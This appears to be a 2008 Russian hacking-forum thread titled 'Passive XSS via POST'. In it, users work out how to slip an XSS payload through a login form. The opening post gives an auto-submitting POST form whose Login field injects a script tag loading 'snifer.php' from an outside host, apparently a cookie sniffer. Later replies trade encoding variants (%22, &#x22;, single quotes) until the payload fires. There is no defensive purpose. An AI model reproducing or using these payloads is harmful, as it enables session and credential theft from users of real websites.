ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Пасивная Xss через Post
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Пасивная Xss через Post
  #1  
Старый 14.01.2008, 03:34
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию Пасивная Xss через Post
Привет всем со старым НГ!!
вот вопрос
PHP код:
<form name="authForm" id="authForm" method="post" action="http://site.ru/login.php">
<input type="hidden" name="Login" value=""><script src="http://site2.ru/snifer.php"></script>">
<input type="hidden" name="securityCode" value="0000">
<input type="hidden" name="Submit.x" value="67">
<input type="hidden" name="Submit.y" value="16">
<script language="JavaScript" type="text/javascript">document.authForm.submit();</script>
</form> 
ответ есть но не срабатывает "><script src="http://site2.ru/snifer.php">
нужно обновить страницу тогда работает

может както подругому зделать?
 
Ответить с цитированием

  #2  
Старый 14.01.2008, 03:42
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Цитата:
value=""><script src="http://site2.ru/snifer.php"></script>">
Попробуй вместо " поставить %22
Последний раз редактировалось bul.666; 14.01.2008 в 03:45..
 
Ответить с цитированием

  #3  
Старый 14.01.2008, 03:43
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
а как быть?

просто в качестве логина надо сылку вида "><script src="http://site2.ru/snifer.php">
 
Ответить с цитированием

  #4  
Старый 14.01.2008, 03:46
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
%22><script src=http://site2.ru/snifer.php></script>
Попробуй так
 
Ответить с цитированием

  #5  
Старый 14.01.2008, 03:48
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
так не работает
 
Ответить с цитированием

  #6  
Старый 14.01.2008, 03:50
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
в поле логин %22><script src=http://site2.ru/snifer.php></script>
 
Ответить с цитированием

  #7  
Старый 14.01.2008, 03:51
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
так работает &#x22;><script src=http://site2.ru/snifer.php></script>!!!

но надо обновить страницу чтоб выполнился <script src=http://site2.ru/snifer.php></script>
 
Ответить с цитированием

  #8  
Старый 14.01.2008, 03:51
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Ой торможу =)
value='"><script src=http://site2.ru/snifer.php></script>'>
 
Ответить с цитированием

  #9  
Старый 14.01.2008, 12:09
Student :)
Участник форума
Регистрация: 09.02.2007
Сообщений: 202
Провел на форуме:
537148

Репутация: 9
Отправить сообщение для Student :) с помощью ICQ
По умолчанию
Помогите решить с меня +
 
Ответить с цитированием

  #10  
Старый 14.01.2008, 12:11
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
Юзай FireBug в фф, там нажать применить и обновишь страницу, все ок будет
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Dle есть ли пасивная Xss ? Student :) Уязвимости 1 25.12.2007 19:43
через xss куки на снифер LeopardSS E-Mail 1 20.01.2006 21:18
Взлом IBP 2.0.4 через Xss Astro Форумы 3 29.11.2005 21:29
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ